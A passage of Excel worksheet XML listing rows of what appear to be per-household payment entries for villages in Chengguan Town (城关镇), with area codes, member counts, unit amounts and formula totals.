    <row r="525" customHeight="1" spans="1:11">
      <c r="A525" s="23" t="s">
        <v>1478</v>
      </c>
      <c r="B525" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C525" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D525" s="24" t="s">
        <v>1479</v>
      </c>
      <c r="E525" s="24" t="s">
        <v>1480</v>
      </c>
      <c r="F525" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G525" s="24">
        <v>2</v>
      </c>
      <c r="H525" s="25">
        <v>365</v>
      </c>
      <c r="I525" s="24">
        <f t="shared" si="8"/>
        <v>730</v>
      </c>
      <c r="J525" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K525" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="526" customHeight="1" spans="1:11">
      <c r="A526" s="23" t="s">
        <v>1481</v>
      </c>
      <c r="B526" s="24" t="str">
        <f>B525</f>
        <v>城关镇</v>
      </c>
      <c r="C526" s="24" t="str">
        <f>C525</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D526" s="27" t="s">
        <v>1482</v>
      </c>
      <c r="E526" s="27" t="s">
        <v>340</v>
      </c>
      <c r="F526" s="24" t="str">
        <f>F525</f>
        <v>4113210108</v>
      </c>
      <c r="G526" s="24"/>
      <c r="H526" s="24"/>
      <c r="I526" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J526" s="24"/>
      <c r="K526" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="527" customHeight="1" spans="1:11">
      <c r="A527" s="23" t="s">
        <v>1483</v>
      </c>
      <c r="B527" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C527" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D527" s="24" t="s">
        <v>1484</v>
      </c>
      <c r="E527" s="24" t="s">
        <v>958</v>
      </c>
      <c r="F527" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G527" s="24">
        <v>2</v>
      </c>
      <c r="H527" s="25">
        <v>325</v>
      </c>
      <c r="I527" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J527" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K527" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="528" customHeight="1" spans="1:11">
      <c r="A528" s="23" t="s">
        <v>1485</v>
      </c>
      <c r="B528" s="24" t="str">
        <f>B527</f>
        <v>城关镇</v>
      </c>
      <c r="C528" s="24" t="str">
        <f>C527</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D528" s="23" t="s">
        <v>1486</v>
      </c>
      <c r="E528" s="23" t="s">
        <v>1487</v>
      </c>
      <c r="F528" s="24" t="str">
        <f>F527</f>
        <v>4113210103</v>
      </c>
      <c r="G528" s="24"/>
      <c r="H528" s="24"/>
      <c r="I528" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J528" s="24"/>
      <c r="K528" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="529" customHeight="1" spans="1:11">
      <c r="A529" s="23" t="s">
        <v>1488</v>
      </c>
      <c r="B529" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C529" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D529" s="24" t="s">
        <v>1489</v>
      </c>
      <c r="E529" s="24" t="s">
        <v>1490</v>
      </c>
      <c r="F529" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G529" s="24">
        <v>1</v>
      </c>
      <c r="H529" s="25">
        <v>365</v>
      </c>
      <c r="I529" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J529" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K529" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="530" customHeight="1" spans="1:11">
      <c r="A530" s="23" t="s">
        <v>1491</v>
      </c>
      <c r="B530" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C530" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D530" s="24" t="s">
        <v>1492</v>
      </c>
      <c r="E530" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F530" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G530" s="24">
        <v>1</v>
      </c>
      <c r="H530" s="25">
        <v>365</v>
      </c>
      <c r="I530" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J530" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K530" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="531" customHeight="1" spans="1:11">
      <c r="A531" s="23" t="s">
        <v>1493</v>
      </c>
      <c r="B531" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C531" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D531" s="24" t="s">
        <v>1494</v>
      </c>
      <c r="E531" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F531" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G531" s="24">
        <v>1</v>
      </c>
      <c r="H531" s="25">
        <v>365</v>
      </c>
      <c r="I531" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J531" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K531" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="532" customHeight="1" spans="1:11">
      <c r="A532" s="23" t="s">
        <v>1495</v>
      </c>
      <c r="B532" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C532" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D532" s="24" t="s">
        <v>1496</v>
      </c>
      <c r="E532" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F532" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G532" s="24">
        <v>1</v>
      </c>
      <c r="H532" s="25">
        <v>365</v>
      </c>
      <c r="I532" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J532" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K532" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="533" customHeight="1" spans="1:11">
      <c r="A533" s="23" t="s">
        <v>1497</v>
      </c>
      <c r="B533" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C533" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D533" s="24" t="s">
        <v>1498</v>
      </c>
      <c r="E533" s="24" t="s">
        <v>389</v>
      </c>
      <c r="F533" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G533" s="24">
        <v>1</v>
      </c>
      <c r="H533" s="25">
        <v>365</v>
      </c>
      <c r="I533" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J533" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K533" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="534" customHeight="1" spans="1:11">
      <c r="A534" s="23" t="s">
        <v>1499</v>
      </c>
      <c r="B534" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C534" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D534" s="24" t="s">
        <v>1500</v>
      </c>
      <c r="E534" s="24" t="s">
        <v>1501</v>
      </c>
      <c r="F534" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G534" s="24">
        <v>1</v>
      </c>
      <c r="H534" s="25">
        <v>365</v>
      </c>
      <c r="I534" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J534" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K534" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="535" customHeight="1" spans="1:11">
      <c r="A535" s="23" t="s">
        <v>1502</v>
      </c>
      <c r="B535" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C535" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D535" s="24" t="s">
        <v>1503</v>
      </c>
      <c r="E535" s="24" t="s">
        <v>1504</v>
      </c>
      <c r="F535" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G535" s="24">
        <v>2</v>
      </c>
      <c r="H535" s="25">
        <v>325</v>
      </c>
      <c r="I535" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J535" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K535" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="536" customHeight="1" spans="1:11">
      <c r="A536" s="23" t="s">
        <v>1505</v>
      </c>
      <c r="B536" s="24" t="str">
        <f>B535</f>
        <v>城关镇</v>
      </c>
      <c r="C536" s="24" t="str">
        <f>C535</f>
        <v>东北村</v>
      </c>
      <c r="D536" s="23" t="s">
        <v>1506</v>
      </c>
      <c r="E536" s="23" t="s">
        <v>479</v>
      </c>
      <c r="F536" s="24" t="str">
        <f>F535</f>
        <v>4113210103</v>
      </c>
      <c r="G536" s="24"/>
      <c r="H536" s="24"/>
      <c r="I536" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J536" s="24"/>
      <c r="K536" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="537" customHeight="1" spans="1:11">
      <c r="A537" s="23" t="s">
        <v>1507</v>
      </c>
      <c r="B537" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C537" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D537" s="24" t="s">
        <v>1508</v>
      </c>
      <c r="E537" s="24" t="s">
        <v>1509</v>
      </c>
      <c r="F537" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G537" s="24">
        <v>2</v>
      </c>
      <c r="H537" s="25">
        <v>325</v>
      </c>
      <c r="I537" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J537" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K537" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="538" customHeight="1" spans="1:11">
      <c r="A538" s="23" t="s">
        <v>1510</v>
      </c>
      <c r="B538" s="24" t="str">
        <f>B537</f>
        <v>城关镇</v>
      </c>
      <c r="C538" s="24" t="str">
        <f>C537</f>
        <v>中华村</v>
      </c>
      <c r="D538" s="23" t="s">
        <v>1511</v>
      </c>
      <c r="E538" s="23" t="s">
        <v>1358</v>
      </c>
      <c r="F538" s="24" t="str">
        <f>F537</f>
        <v>4113210108</v>
      </c>
      <c r="G538" s="24"/>
      <c r="H538" s="24"/>
      <c r="I538" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J538" s="24"/>
      <c r="K538" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="539" customHeight="1" spans="1:11">
      <c r="A539" s="23" t="s">
        <v>1512</v>
      </c>
      <c r="B539" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C539" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D539" s="24" t="s">
        <v>1513</v>
      </c>
      <c r="E539" s="24" t="s">
        <v>1514</v>
      </c>
      <c r="F539" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G539" s="24">
        <v>1</v>
      </c>
      <c r="H539" s="25">
        <v>365</v>
      </c>
      <c r="I539" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J539" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K539" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="540" customHeight="1" spans="1:11">
      <c r="A540" s="23" t="s">
        <v>1515</v>
      </c>
      <c r="B540" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C540" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D540" s="24" t="s">
        <v>1516</v>
      </c>
      <c r="E540" s="24" t="s">
        <v>540</v>
      </c>
      <c r="F540" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G540" s="24">
        <v>1</v>
      </c>
      <c r="H540" s="25">
        <v>365</v>
      </c>
      <c r="I540" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J540" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K540" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="541" customHeight="1" spans="1:11">
      <c r="A541" s="23" t="s">
        <v>1517</v>
      </c>
      <c r="B541" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C541" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D541" s="24" t="s">
        <v>1518</v>
      </c>
      <c r="E541" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F541" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G541" s="24">
        <v>2</v>
      </c>
      <c r="H541" s="25">
        <v>325</v>
      </c>
      <c r="I541" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J541" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K541" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="542" customHeight="1" spans="1:11">
      <c r="A542" s="23" t="s">
        <v>1519</v>
      </c>
      <c r="B542" s="24" t="str">
        <f>B541</f>
        <v>城关镇</v>
      </c>
      <c r="C542" s="24" t="str">
        <f>C541</f>
        <v>西北村</v>
      </c>
      <c r="D542" s="23" t="s">
        <v>1520</v>
      </c>
      <c r="E542" s="23" t="s">
        <v>269</v>
      </c>
      <c r="F542" s="24" t="str">
        <f>F541</f>
        <v>4113210106</v>
      </c>
      <c r="G542" s="24"/>
      <c r="H542" s="24"/>
      <c r="I542" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J542" s="24"/>
      <c r="K542" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="543" customHeight="1" spans="1:11">
      <c r="A543" s="23" t="s">
        <v>1521</v>
      </c>
      <c r="B543" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C543" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D543" s="24" t="s">
        <v>1522</v>
      </c>
      <c r="E543" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F543" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G543" s="24">
        <v>1</v>
      </c>
      <c r="H543" s="25">
        <v>365</v>
      </c>
      <c r="I543" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J543" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K543" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="544" customHeight="1" spans="1:11">
      <c r="A544" s="23" t="s">
        <v>1523</v>
      </c>
      <c r="B544" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C544" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D544" s="24" t="s">
        <v>1524</v>
      </c>
      <c r="E544" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F544" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G544" s="24">
        <v>1</v>
      </c>
      <c r="H544" s="25">
        <v>365</v>
      </c>
      <c r="I544" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J544" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K544" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="545" customHeight="1" spans="1:11">
      <c r="A545" s="23" t="s">
        <v>1525</v>
      </c>
      <c r="B545" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C545" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D545" s="24" t="s">
        <v>1526</v>
      </c>
      <c r="E545" s="24" t="s">
        <v>552</v>
      </c>
      <c r="F545" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G545" s="24">
        <v>1</v>
      </c>
      <c r="H545" s="25">
        <v>365</v>
      </c>
      <c r="I545" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J545" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K545" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="546" customHeight="1" spans="1:11">
      <c r="A546" s="23" t="s">
        <v>1527</v>
      </c>
      <c r="B546" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C546" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D546" s="24" t="s">
        <v>1528</v>
      </c>
      <c r="E546" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F546" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G546" s="24">
        <v>2</v>
      </c>
      <c r="H546" s="25">
        <v>325</v>
      </c>
      <c r="I546" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J546" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K546" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="547" customHeight="1" spans="1:11">
      <c r="A547" s="23" t="s">
        <v>1529</v>
      </c>
      <c r="B547" s="24" t="str">
        <f>B546</f>
        <v>城关镇</v>
      </c>
      <c r="C547" s="24" t="str">
        <f>C546</f>
        <v>东北村</v>
      </c>
      <c r="D547" s="23" t="s">
        <v>1530</v>
      </c>
      <c r="E547" s="23" t="s">
        <v>540</v>
      </c>
      <c r="F547" s="24" t="str">
        <f>F546</f>
        <v>4113210103</v>
      </c>
      <c r="G547" s="24"/>
      <c r="H547" s="24"/>
      <c r="I547" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J547" s="24"/>
      <c r="K547" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="548" customHeight="1" spans="1:11">
      <c r="A548" s="23" t="s">
        <v>1531</v>
      </c>
      <c r="B548" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C548" s="24" t="s">
        <v>1532</v>
      </c>
      <c r="D548" s="24" t="s">
        <v>1533</v>
      </c>
      <c r="E548" s="24" t="s">
        <v>1534</v>
      </c>
      <c r="F548" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G548" s="24">
        <v>1</v>
      </c>
      <c r="H548" s="25">
        <v>365</v>
      </c>
      <c r="I548" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J548" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K548" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="549" customHeight="1" spans="1:11">
      <c r="A549" s="23" t="s">
        <v>1535</v>
      </c>
      <c r="B549" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C549" s="24" t="s">
        <v>1536</v>
      </c>
      <c r="D549" s="24" t="s">
        <v>1537</v>
      </c>
      <c r="E549" s="24" t="s">
        <v>866</v>
      </c>
      <c r="F549" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G549" s="24">
        <v>2</v>
      </c>
      <c r="H549" s="25">
        <v>325</v>
      </c>
      <c r="I549" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J549" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K549" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="550" customHeight="1" spans="1:11">
      <c r="A550" s="23" t="s">
        <v>1538</v>
      </c>
      <c r="B550" s="24" t="str">
        <f>B549</f>
        <v>城关镇</v>
      </c>
      <c r="C550" s="24" t="str">
        <f>C549</f>
        <v>城关镇中华</v>
      </c>
      <c r="D550" s="23" t="s">
        <v>1539</v>
      </c>
      <c r="E550" s="23" t="s">
        <v>765</v>
      </c>
      <c r="F550" s="24" t="str">
        <f>F549</f>
        <v>4113210108</v>
      </c>
      <c r="G550" s="24"/>
      <c r="H550" s="24"/>
      <c r="I550" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J550" s="24"/>
      <c r="K550" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="551" customHeight="1" spans="1:11">
      <c r="A551" s="23" t="s">
        <v>1540</v>
      </c>
      <c r="B551" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C551" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D551" s="24" t="s">
        <v>1541</v>
      </c>
      <c r="E551" s="24" t="s">
        <v>1542</v>
      </c>
      <c r="F551" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G551" s="24">
        <v>1</v>
      </c>
      <c r="H551" s="25">
        <v>365</v>
      </c>
      <c r="I551" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J551" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K551" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="552" customHeight="1" spans="1:11">
      <c r="A552" s="23" t="s">
        <v>1543</v>
      </c>
      <c r="B552" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C552" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D552" s="24" t="s">
        <v>1544</v>
      </c>
      <c r="E552" s="24" t="s">
        <v>1545</v>
      </c>
      <c r="F552" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G552" s="24">
        <v>3</v>
      </c>
      <c r="H552" s="25">
        <v>290</v>
      </c>
      <c r="I552" s="24">
        <f t="shared" si="8"/>
        <v>870</v>
      </c>
      <c r="J552" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K552" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="553" customHeight="1" spans="1:11">
      <c r="A553" s="23" t="s">
        <v>1546</v>
      </c>
      <c r="B553" s="24" t="str">
        <f>B552</f>
        <v>城关镇</v>
      </c>
      <c r="C553" s="24" t="str">
        <f>C552</f>
        <v>东北村</v>
      </c>
      <c r="D553" s="30" t="s">
        <v>1547</v>
      </c>
      <c r="E553" s="31" t="s">
        <v>1548</v>
      </c>
      <c r="F553" s="24" t="str">
        <f>F552</f>
        <v>4113210103</v>
      </c>
      <c r="G553" s="24"/>
      <c r="H553" s="24"/>
      <c r="I553" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J553" s="24"/>
      <c r="K553" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="554" customHeight="1" spans="1:11">
      <c r="A554" s="23" t="s">
        <v>1549</v>
      </c>
      <c r="B554" s="24" t="str">
        <f>B553</f>
        <v>城关镇</v>
      </c>
      <c r="C554" s="24" t="str">
        <f>C553</f>
        <v>东北村</v>
      </c>
      <c r="D554" s="31" t="s">
        <v>1550</v>
      </c>
      <c r="E554" s="31" t="s">
        <v>1551</v>
      </c>
      <c r="F554" s="24" t="str">
        <f>F553</f>
        <v>4113210103</v>
      </c>
      <c r="G554" s="24"/>
      <c r="H554" s="24"/>
      <c r="I554" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J554" s="24"/>
      <c r="K554" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="555" customHeight="1" spans="1:11">
      <c r="A555" s="23" t="s">
        <v>1552</v>
      </c>
      <c r="B555" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C555" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D555" s="24" t="s">
        <v>1553</v>
      </c>
      <c r="E555" s="24" t="s">
        <v>1554</v>
      </c>
      <c r="F555" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G555" s="24">
        <v>1</v>
      </c>
      <c r="H555" s="25">
        <v>365</v>
      </c>
      <c r="I555" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J555" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K555" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="556" customHeight="1" spans="1:11">
      <c r="A556" s="23" t="s">
        <v>1555</v>
      </c>
      <c r="B556" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C556" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D556" s="24" t="s">
        <v>1556</v>
      </c>
      <c r="E556" s="24" t="s">
        <v>669</v>
      </c>
      <c r="F556" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G556" s="24">
        <v>2</v>
      </c>
      <c r="H556" s="25">
        <v>325</v>
      </c>
      <c r="I556" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J556" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K556" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="557" customHeight="1" spans="1:11">
      <c r="A557" s="23" t="s">
        <v>1557</v>
      </c>
      <c r="B557" s="24" t="str">
        <f>B556</f>
        <v>城关镇</v>
      </c>
      <c r="C557" s="24" t="str">
        <f>C556</f>
        <v>东北村</v>
      </c>
      <c r="D557" s="30" t="s">
        <v>1558</v>
      </c>
      <c r="E557" s="31" t="s">
        <v>288</v>
      </c>
      <c r="F557" s="24" t="str">
        <f>F556</f>
        <v>4113210103</v>
      </c>
      <c r="G557" s="24"/>
      <c r="H557" s="24"/>
      <c r="I557" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J557" s="24"/>
      <c r="K557" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="558" customHeight="1" spans="1:11">
      <c r="A558" s="23" t="s">
        <v>1559</v>
      </c>
      <c r="B558" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C558" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D558" s="24" t="s">
        <v>1560</v>
      </c>
      <c r="E558" s="24" t="s">
        <v>309</v>
      </c>
      <c r="F558" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G558" s="24">
        <v>2</v>
      </c>
      <c r="H558" s="25">
        <v>325</v>
      </c>
      <c r="I558" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J558" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K558" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="559" customHeight="1" spans="1:11">
      <c r="A559" s="23" t="s">
        <v>1561</v>
      </c>
      <c r="B559" s="24" t="str">
        <f>B558</f>
        <v>城关镇</v>
      </c>
      <c r="C559" s="24" t="str">
        <f>C558</f>
        <v>城关镇北外村</v>
      </c>
      <c r="D559" s="36" t="s">
        <v>1562</v>
      </c>
      <c r="E559" s="36" t="s">
        <v>281</v>
      </c>
      <c r="F559" s="24" t="str">
        <f>F558</f>
        <v>4113210102</v>
      </c>
      <c r="G559" s="24"/>
      <c r="H559" s="24"/>
      <c r="I559" s="24">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="J559" s="24"/>
      <c r="K559" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="560" customHeight="1" spans="1:11">
      <c r="A560" s="23" t="s">
        <v>1563</v>
      </c>
      <c r="B560" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C560" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D560" s="24" t="s">
        <v>1564</v>
      </c>
      <c r="E560" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F560" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G560" s="24">
        <v>1</v>
      </c>
      <c r="H560" s="25">
        <v>365</v>
      </c>
      <c r="I560" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J560" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K560" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="561" customHeight="1" spans="1:11">
      <c r="A561" s="23" t="s">
        <v>1565</v>
      </c>
      <c r="B561" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C561" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D561" s="24" t="s">
        <v>1566</v>
      </c>
      <c r="E561" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F561" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G561" s="24">
        <v>1</v>
      </c>
      <c r="H561" s="25">
        <v>365</v>
      </c>
      <c r="I561" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J561" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K561" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="562" customHeight="1" spans="1:11">
      <c r="A562" s="23" t="s">
        <v>1567</v>
      </c>
      <c r="B562" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C562" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D562" s="24" t="s">
        <v>1568</v>
      </c>
      <c r="E562" s="24" t="s">
        <v>389</v>
      </c>
      <c r="F562" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G562" s="24">
        <v>1</v>
      </c>
      <c r="H562" s="25">
        <v>365</v>
      </c>
      <c r="I562" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J562" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K562" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="563" customHeight="1" spans="1:11">
      <c r="A563" s="23" t="s">
        <v>1569</v>
      </c>
      <c r="B563" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C563" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D563" s="24" t="s">
        <v>1570</v>
      </c>
      <c r="E563" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F563" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G563" s="24">
        <v>1</v>
      </c>
      <c r="H563" s="25">
        <v>365</v>
      </c>
      <c r="I563" s="24">
        <f t="shared" si="8"/>
        <v>365</v>
      </c>
      <c r="J563" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K563" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="564" customHeight="1" spans="1:11">
      <c r="A564" s="23" t="s">
        <v>1571</v>
      </c>
      <c r="B564" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C564" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D564" s="24" t="s">
        <v>1572</v>
      </c>
      <c r="E564" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F564" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G564" s="24">
        <v>2</v>
      </c>
      <c r="H564" s="25">
        <v>325</v>
      </c>
      <c r="I564" s="24">
        <f t="shared" si="8"/>
        <v>650</v>
      </c>
      <c r="J564" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K564" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="565" customHeight="1" spans="1:11">
      <c r="A565" s="23" t="s">
        <v>1573</v>
